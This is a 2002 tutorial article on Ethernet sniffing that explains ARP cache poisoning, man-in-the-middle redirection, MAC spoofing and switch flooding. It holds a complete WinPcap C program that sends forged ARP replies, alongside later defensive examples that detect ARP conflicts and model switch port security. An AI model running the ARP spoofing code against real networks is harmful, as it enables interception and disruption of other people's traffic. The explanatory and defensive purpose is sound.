Creation time: 2002-04-11
Article attribute: original
Article source: www.opengram.com
Article submission: Refdom (refDom_at_263.net)
Author: Refdom
Email: Refdom@263.net
Homepage: http://www.opengram.com
2002-4-6
Sniffing on Ethernet is bad news for network security. It does let a network administrator trace packets and discover network problems, but used destructively it is a serious security threat to the whole network. As for the benefits and harms of sniffing...
ARP cache table
Suppose a network like this:

            ------------
            |   HUB    |
            ------------
              |   |   |
              |   |   |
              |   |   |
           HostA HostB HostC

where
A's address is: IP 192.168.10.1, MAC AA-AA-AA-AA-AA-AA
B's address is: IP 192.168.10.2, MAC BB-BB-BB-BB-BB-BB
C's address is: IP 192.168.10.3, MAC CC-CC-CC-CC-CC-CC
Suppose B is the sniffing enthusiast. Host A's ARP cache looks like this:

C:\>arp -a
Interface: 192.168.10.1 on Interface 0x1000003
  Internet Address      Physical Address      Type
  192.168.10.3          CC-CC-CC-CC-CC-CC     Dynamic
This is the ARP cache of machine 192.168.10.1. Suppose that at some moment A pings 192.168.10.3, host C. A first looks up its local ARP cache for the MAC address belonging to C's IP address and then sends the data with C's MAC address as the destination. If A has no entry for C, A first broadcasts an ARP request; when C receives it, C sends a reply that contains C's MAC address; when A receives C's reply, it updates its local ARP cache and then uses that MAC address to send the data (the frame is handed to the NIC). So this locally cached ARP table is the basis for traffic on the local network, and the cache is dynamic.
Hub-Based
Many networks are connected with a HUB. When a packet passes through the HUB on its way to another computer, the HUB simply broadcasts the packet on all of its ports. This is the network structure in the example above.

Now A needs to send a TCP packet to C. First A looks in its local ARP cache for an entry for 192.168.10.3, C's IP address. If there is none, A broadcasts an ARP request; C receives the request and replies; A updates its own ARP cache and so obtains the MAC address for C's IP. Now the TCP packet is sent, with C's MAC address in the Ethernet frame. When the packet reaches the HUB, the HUB broadcasts the whole packet straight to all ports, and so C receives the packet A sent.

Because the HUB broadcasts data to every port, computer B also receives the packet sent to C. That is exactly what B's sniffing counts on. So a hub-based network has basically no security, and sniffing in such a network is very easy.

Switched networks (Switch LAN)
Using a switch in place of the HUB solves several of the HUB's security problems, among them the sniffing problem. A switch does not broadcast to all ports; based on the packet, it decides which port to forward it to from its own cache table. So in a switched network, if the HUB in the example above is replaced with a switch, B will not receive the packet sent to C, and even with its NIC in promiscuous mode it cannot sniff.
ARP spoofing (ARP spoof)
ARP does not act only on ARP requests. When a computer receives an ARP reply packet, it also updates its local ARP cache, storing the IP and MAC address carried in the reply. So in the network above, B sends A a forged ARP reply whose sender IP address is 192.168.10.3 (C's IP address) and whose sender MAC address is DD-DD-DD-DD-DD-DD (C's MAC address should be CC-CC-CC-CC-CC-CC; it is forged here). When A receives B's forged ARP reply, it updates its local ARP cache (A may not know that it is forged).

Now A's ARP cache has been updated:

C:\>arp -a
Interface: 192.168.10.1 on Interface 0x1000003
  Internet Address      Physical Address      Type
  192.168.10.3          DD-DD-DD-DD-DD-DD     DYNAMIC
This is no small matter. Traffic on a LAN is not delivered by IP address but by MAC address. In A's cache, the MAC address for 192.168.10.3 has been changed to one that does not exist. Now when A pings 192.168.10.3, the MAC address handed to the NIC is DD-DD-DD-DD-DD-DD. What is the result? The traffic goes nowhere, and A cannot ping C!!
This is a simple ARP spoof.
Let's implement this ARP spoof. It needs the WinPcap API and driver (http://winpcap.polito.it/). WinPcap is a great open project; Nmap, Snort and WinDump on Windows all use WinPcap.
///////////////////////////////////////////////////////////////////////
//
//  ARP Sender
//
//  Creator:   Refdom
//  Email:     Refdom@263.net
//  Home Page: www.opengram.com
//
//  2002/4/7
//
///////////////////////////////////////////////////////////////////////

#include "stdafx.h"
#include "mac.h"       // GetMacAddr(): my own string-to-MAC-address helper, not listed here
#include <packet32.h>  // WinPcap packet driver API (the header names were lost from the listing)
#include <winsock2.h>  // htons(), inet_addr()

#define EPT_IP          0x0800  /* type: IP   */
#define EPT_ARP         0x0806  /* type: ARP  */
#define EPT_RARP        0x8035  /* type: RARP */

#define ARP_HARDWARE    0x0001  /* dummy type for 802.3 frames */
#define ARP_REQUEST     0x0001  /* ARP request */
#define ARP_REPLY       0x0002  /* ARP reply   */

#define MAX_NUM_ADAPTER 10

#pragma pack(push, 1)
typedef struct ehhdr
{
    unsigned char  eh_dst[6];   /* destination ethernet address */
    unsigned char  eh_src[6];   /* source ethernet address      */
    unsigned short eh_type;     /* ethernet packet type         */
} EHHDR, *PEHHDR;

typedef struct arphdr
{
    unsigned short arp_hrd;     /* format of hardware address */
    unsigned short arp_pro;     /* format of protocol address */
    unsigned char  arp_hln;     /* length of hardware address */
    unsigned char  arp_pln;     /* length of protocol address */
    unsigned short arp_op;      /* ARP/RARP operation         */
    unsigned char  arp_sha[6];  /* sender hardware address    */
    unsigned long  arp_spa;     /* sender protocol address    */
    unsigned char  arp_tha[6];  /* target hardware address    */
    unsigned long  arp_tpa;     /* target protocol address    */
} ARPHDR, *PARPHDR;

typedef struct arppacket
{
    EHHDR  ehhdr;
    ARPHDR arphdr;
} ARPPACKET, *PARPPACKET;
#pragma pack(pop)

int main(int argc, char *argv[])
{
    static char AdapterList[MAX_NUM_ADAPTER][1024];
    char        szPacketBuf[600];
    char        MacAddr[6];
    LPADAPTER   lpAdapter;
    LPPACKET    lpPacket;
    WCHAR       AdapterName[2048];
    WCHAR      *temp, *temp1;
    ARPPACKET   ARPPacket;
    ULONG       AdapterLength = 1024;
    int         AdapterNum = 0;
    int         nRetCode, i;

    // get the list of adapters
    if (PacketGetAdapterNames((char *)AdapterName, &AdapterLength) == FALSE)
    {
        printf("Unable to retrieve the list of the adapters!\n");
        return 0;
    }

    // the names come back as a block of NUL-separated wide strings ending in a double NUL
    temp  = AdapterName;
    temp1 = AdapterName;
    i = 0;
    while ((*temp != '\0') || (*(temp - 1) != '\0'))
    {
        if (*temp == '\0')
        {
            memcpy(AdapterList[i], temp1, (temp - temp1) * 2);
            temp1 = temp + 1;
            i++;
        }
        temp++;
    }
    AdapterNum = i;
    for (i = 0; i < AdapterNum; i++)
        wprintf(L"\n%d- %s\n", i + 1, AdapterList[i]);
    printf("\n");

    // open the first adapter by default (assumed to be the right one)
    lpAdapter = (LPADAPTER)PacketOpenAdapter((LPTSTR)AdapterList[0]);
    if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
    {
        nRetCode = GetLastError();
        printf("Unable to open the driver, Error Code : %lx\n", nRetCode);
        return 0;
    }

    lpPacket = PacketAllocatePacket();
    if (lpPacket == NULL)
    {
        printf("\nError: failed to allocate the LPPACKET structure.");
        return 0;
    }

    ZeroMemory(szPacketBuf, sizeof(szPacketBuf));

    // Ethernet header: destination MAC address (A's address)
    if (!GetMacAddr("AAAAAAAAAAAA", MacAddr))
    {
        printf("Get MAC address error!\n");
        return 0;
    }
    memcpy(ARPPacket.ehhdr.eh_dst, MacAddr, 6);

    // Ethernet header: source MAC address (B, the sender)
    if (!GetMacAddr("BBBBBBBBBBBB", MacAddr))
    {
        printf("Get MAC address error!\n");
        return 0;
    }
    memcpy(ARPPacket.ehhdr.eh_src, MacAddr, 6);

    ARPPacket.ehhdr.eh_type  = htons(EPT_ARP);
    ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE);
    ARPPacket.arphdr.arp_pro = htons(EPT_IP);
    ARPPacket.arphdr.arp_hln = 6;
    ARPPacket.arphdr.arp_pln = 4;
    ARPPacket.arphdr.arp_op  = htons(ARP_REPLY);

    // forged sender MAC address claimed for C
    if (!GetMacAddr("DDDDDDDDDDDD", MacAddr))
    {
        printf("Get MAC address error!\n");
        return 0;
    }
    memcpy(ARPPacket.arphdr.arp_sha, MacAddr, 6);
    ARPPacket.arphdr.arp_spa = inet_addr("192.168.10.3");  // C's IP address

    // target: A's MAC address and IP address
    if (!GetMacAddr("AAAAAAAAAAAA", MacAddr))
    {
        printf("Get MAC address error!\n");
        return 0;
    }
    memcpy(ARPPacket.arphdr.arp_tha, MacAddr, 6);
    ARPPacket.arphdr.arp_tpa = inet_addr("192.168.10.1");  // A's IP address

    memcpy(szPacketBuf, (char *)&ARPPacket, sizeof(ARPPacket));
    PacketInitPacket(lpPacket, szPacketBuf, 60);           // padded to the 60-byte minimum frame

    if (PacketSetNumWrites(lpAdapter, 2) == FALSE)
    {
        printf("Warning: Unable to send more than one packet in a single write!\n");
    }

    if (PacketSendPacket(lpAdapter, lpPacket, TRUE) == FALSE)
    {
        printf("Error sending the packets!\n");
        return 0;
    }
    printf("Send OK!\n");

    // close the adapter and exit
    PacketFreePacket(lpPacket);
    PacketCloseAdapter(lpAdapter);
    return 0;
}

So A receives a forged ARP reply, and A is deceived!! If some machine on the LAN is not to your liking, ...

Sniffing on Ethernet is extremely effective, but a switched network limits sniffing and takes much of the shine off it. Still, it is easy enough to see that the cache table in the host, and likewise in the switch (its dynamically updated address table, much the same thing), is still (mostly) dynamic. To sniff effectively in a switched network (underground work?), you need methods for dealing with these various cache tables: deceive them, even throw them into confusion. On the foundation of ARP spoofing, we can do that.

Using ARP spoofing
As in the program above, target A is deceived, and A's pings to host C are sent to the address DD-DD-DD-DD-DD-DD. If instead C's MAC address is spoofed as BB-BB-BB-BB-BB-BB, the packets A sends to C are delivered to B. B happily receives the packets A sends, and the sniffing succeeds. A does not notice the change, but what happens next will make A suspicious, because A and C are no longer connected!! The packets A sends to C, now delivered to B, cannot reach C. So do "man in the middle" ARP redirection: turn on IP forwarding on B and forward the packets A sends on to C, like a router. But if B sends ICMP redirects, that disrupts the whole plan. Alternatively, modify and forward the whole packet directly: capture the packets A sends, modify them as needed and forward them to C, and C takes the packets it receives as sent by A. The packets C sends, however, still go directly to A; for that, carry out the same ARP spoofing against C. Now B is completely the bridge between A and C.
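An added example, not part of the original article and not WinPcap code: the same frame layout as the ehhdr/arphdr structs above, read from the defender's side. check_frame() keeps the IP-to-MAC bindings a host has already learned and flags an ARP reply whose sender MAC differs from the one recorded for that IP, which is what the forged reply above does to A's cache; make_reply() only builds constructed frames in memory for the scenario, using the addresses of the example network.

```c
#include <stdint.h>
#include <string.h>
#define EPT_ARP   0x0806
#define ARP_REPLY 0x0002
enum verdict { ARP_IGNORED, ARP_LEARNED, ARP_CONSISTENT, ARP_CONFLICT };
/* Learned IP -> MAC bindings, the role a host's ARP cache plays. */
static struct { uint32_t ip; uint8_t mac[6]; } table[16];
static int ntable;
/* Offsets follow the ehhdr/arphdr structs in the program above: Ethernet type at
 * 12, arp_op at 20, arp_sha at 22, arp_spa at 28 (42 bytes in all). Only ARP replies
 * are judged: the first MAC seen for an IP is learned and a later reply must repeat
 * it; anything else is a conflict worth alerting on. */
enum verdict check_frame(const uint8_t *f, size_t len)
{
    if (len < 42 || (f[12] << 8 | f[13]) != EPT_ARP || (f[20] << 8 | f[21]) != ARP_REPLY)
        return ARP_IGNORED;
    const uint8_t *sha = f + 22;
    uint32_t spa = (uint32_t)f[28] << 24 | (uint32_t)f[29] << 16 | f[30] << 8 | f[31];
    for (int i = 0; i < ntable; i++)
        if (table[i].ip == spa)
            return memcmp(table[i].mac, sha, 6) == 0 ? ARP_CONSISTENT : ARP_CONFLICT;
    if (ntable == 16) return ARP_IGNORED;              /* table full: cannot judge */
    table[ntable].ip = spa;
    memcpy(table[ntable++].mac, sha, 6);
    return ARP_LEARNED;
}

/* Builds a constructed 42-byte ARP reply "spa is at sha" addressed to host A. */
void make_reply(uint8_t *f, const uint8_t *sha, uint32_t spa)
{
    static const uint8_t a_mac[6] = {0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA};
    static const uint8_t fixed[10] = {0x08, 0x06, 0x00, 0x01, 0x08, 0x00, 6, 4, 0x00, 0x02};
    memcpy(f, a_mac, 6);       memcpy(f + 6, sha, 6);   /* eth dst = A, eth src */
    memcpy(f + 12, fixed, 10); memcpy(f + 22, sha, 6);  /* type, hrd, pro, hln, pln, op, sha */
    for (int i = 0; i < 4; i++) f[28 + i] = (uint8_t)(spa >> (24 - 8 * i));
    memcpy(f + 32, a_mac, 6);                           /* arp_tha = A */
    f[38] = 192; f[39] = 168; f[40] = 10; f[41] = 1;    /* arp_tpa = 192.168.10.1 */
}

/* Replays the article's scenario: C answers truthfully twice, then B's forged
 * reply claims 192.168.10.3 is at DD-DD-DD-DD-DD-DD. Verdicts return as digits. */
int arp_scenario(void)
{
    static const uint8_t mac[2][6] = {{0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC}, {0xDD, 0xDD, 0xDD, 0xDD, 0xDD, 0xDD}};
    uint8_t f[42]; int r = 0; ntable = 0;
    make_reply(f, mac[0], 0xC0A80A03); r = r * 10 + check_frame(f, 42);
    r = r * 10 + check_frame(f, 42);
    make_reply(f, mac[1], 0xC0A80A03); r = r * 10 + check_frame(f, 42);
    return r;                                           /* 123: learned, consistent, conflict */
}
```

Run on live traffic, the same check also catches a reply whose arp_sha differs from the Ethernet source address, as the forged packet's DD sender MAC does from B's own BB address.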
MAC spoofing against the switch
The switch also maintains a dynamic MAC cache. Inside the switch there is a table mapping ports to MAC addresses, port n <-> MAC, listing the MAC addresses that sit below each port. This table starts out empty, and the switch learns it from the data frames it sees. For example, when the computer connected to port 1 sends a data frame, the frame enters the switch from port 1, the switch takes the source MAC address AAAA from the frame and records in its address table: port 1 <-> AAAA. From then on, every frame destined for AAAA is output on port 1 only, never on the other ports.

This is similar to the target hosts above. If the MAC-port table on the switch is altered, the MAC-port correspondence follows, and data that should not have gone to the sniffer is sent to it, which again achieves sniffing. Change the source MAC address of the local (B) packets to A's MAC address; when they pass through the switch, the switch finds that the address on B's port is machine A's MAC, and frames addressed to that MAC are then sent out of B's port instead of A's. So machine B can obtain the data sent to A. There is a problem here, though: A no longer receives the data, and the aim of sniffing is not to destroy normal data communication. At the same time, whether the trick just described can make one MAC address correspond to several ports in the switch is not clear to me. Please advise.

Flooding the switch
This follows the same principle of the switch's MAC-port correspondence: because the MAC-port cache table is updated dynamically, the correspondence of every port on the switch can be changed by spoofing the switch with MAC addresses, constantly sending packets carrying a large number of fake MAC addresses. The switch keeps updating its MAC-port cache. If the previous, correct MAC-port relationships are destroyed this way, the switch floods frames to every port and essentially becomes a HUB, sending packets to all ports, which again achieves sniffing. There are problems: how a switch handles this is limited, and because the situation is abnormal it may cause packet loss, and how the switch behaves in such an extreme state is still unknown. If it does great damage to network communication, that is no longer ordinary sniffing (sniffing also causes some loss). The various operations against a switch require care; if port protection is turned on, they may shut down every user. So deceiving the switch or otherwise manipulating it is not as good as deceiving a target host or a router.

As for the sniffing methods above, they all rely on these dynamic tables. So static ARP entries can be used to guard against them. On Windows, use arp -s to configure static ARP entries.

Thanks to WinPcap, this open project, and thanks to DanceFire for a great deal of help and corrections. My knowledge of network devices is still insufficient; please advise.
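An added example, not from the original article: a small model of the switch's learned MAC-port table (switch_frame(), a constructed model and not any vendor's implementation) covering the behaviours described in the two switch sections above: forwarding on a learned entry, the entry moving when a frame with the same source MAC arrives on another port, and flooding to all ports when the destination is unknown. It also models the port protection mentioned above as a per-port limit on newly seen MACs; the limit value PORT_LIMIT and the port numbering are assumptions.

```c
#include <stdint.h>
#include <string.h>
#define MAX_MACS   8    /* MAC-port table size, kept tiny for the demo */
#define PORT_LIMIT 2    /* port security: MACs allowed to appear on one port (assumed) */
#define NPORTS     4
enum action { FORWARD, FLOOD, PORT_DOWN };

/* The switch's MAC-port table, learned from the source MAC of every frame. */
static struct { uint8_t mac[6]; int port; } cam[MAX_MACS];
static int ncam, seen_on[NPORTS], shut[NPORTS];
static int find(const uint8_t *mac) {
    for (int i = 0; i < ncam; i++) if (memcmp(cam[i].mac, mac, 6) == 0) return i;
    return -1;
}
/* Learn src on in_port, then choose the output for dst: FORWARD to the one port
 * that owns dst, or FLOOD to every port when dst is unknown (the state a MAC flood
 * drives the switch into). Port security counts each MAC that is new to a port,
 * including one that moved from another port, and shuts the port past PORT_LIMIT. */
enum action switch_frame(int in_port, const uint8_t *src, const uint8_t *dst, int *out_port)
{
    *out_port = -1;
    if (shut[in_port]) return PORT_DOWN;
    int i = find(src);
    if (i < 0 || cam[i].port != in_port) {
        if (++seen_on[in_port] > PORT_LIMIT) { shut[in_port] = 1; return PORT_DOWN; }
        if (i >= 0) cam[i].port = in_port;          /* entry moved: what the MAC spoof relies on */
        else if (ncam < MAX_MACS) { memcpy(cam[ncam].mac, src, 6); cam[ncam++].port = in_port; }
    }
    int d = find(dst);
    if (d < 0) return FLOOD;
    *out_port = cam[d].port;
    return FORWARD;
}

/* A on port 1, B on port 2, C on port 3. Returns four digits: the action for A->C,
 * the port C->A goes to, that port again after B sends a frame carrying A's MAC,
 * and the action when B's third unknown MAC appears on port 2. */
int switch_scenario(void)
{
    static const uint8_t a[6] = {0xAA,0xAA,0xAA,0xAA,0xAA,0xAA}, c[6] = {0xCC,0xCC,0xCC,0xCC,0xCC,0xCC};
    uint8_t fake[6] = {0x00,0x11,0x22,0x33,0x44,0x00};   /* constructed bogus MACs */
    int out, r = 0;
    ncam = 0; memset(seen_on, 0, sizeof seen_on); memset(shut, 0, sizeof shut);
    r = r * 10 + switch_frame(1, a, c, &out);             /* C unknown yet: FLOOD = 1 */
    switch_frame(3, c, a, &out);  r = r * 10 + out;       /* A is known on port 1 */
    switch_frame(2, a, c, &out);                          /* B claims A's MAC */
    switch_frame(3, c, a, &out);  r = r * 10 + out;       /* now delivered to port 2 */
    fake[5] = 1; switch_frame(2, fake, c, &out);          /* second MAC on port 2 */
    fake[5] = 2; r = r * 10 + switch_frame(2, fake, c, &out); /* third: PORT_DOWN = 2 */
    return r;                                             /* 1122 */
}
```

The third digit is the MAC spoof's effect (C's reply for A now leaves B's port) and the fourth is the flood being stopped by the port limit, which is also why the article warns that port protection can take users offline.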